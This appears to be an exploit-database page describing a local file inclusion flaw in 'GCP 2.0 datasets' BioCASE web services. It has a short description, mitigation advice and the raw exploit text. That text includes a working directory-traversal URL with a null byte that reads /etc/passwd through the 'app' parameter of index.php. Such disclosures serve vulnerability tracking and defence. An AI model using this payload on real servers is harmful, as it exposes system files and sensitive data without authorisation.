header-logo
Suggest Exploit
vendor:
GCP 2.0 datasets
by:
R3VAN_BASTARD
8,8
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: GCP 2.0 datasets
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

GCP 2.0 datasets provided as BioCASE web services

The vulnerability exists in the ‘app’ parameter of the ‘index.php’ file. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable server. The attacker can include a malicious file from the server by using the ‘../’ directory traversal technique. This can lead to the disclosure of sensitive information from the server.

Mitigation:

The application should validate the user input and filter out any malicious characters. The application should also restrict the user from accessing any sensitive files.
Source

Exploit-DB raw data:

========================================================================
#   .::GCP 2.0 datasets provided as BioCASE web services::.            #
#                  (Local File Inclusion)                              #
========================================================================
========================================================================
Author  : R3VAN_BASTARD
Site    : www.sux0r.net
Provider: http://www.biocase.org
========================================================================
[x] Vulnerability:/index.php?app=
========================================================================
[x] demo:
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
=========================================================================
saludos cordiales:
VALENCIA : S3T4N : YOGA0400 : JACK (PAMAN) : VRS-HCK : YADOY666
NOGE : OON_BOY : MADONK : KECEMPLUNG-KALEN : YUDIS : DECLINED
BADFELLAS.co : ALL HIP-HOP "satu atap" : BASS PRO "rhythm and Distortion"
MAINHACK : SERVER IS DOWN : ALL POINT BLANK PLAYER FEEL THE HEAD SHOT
=========================================================================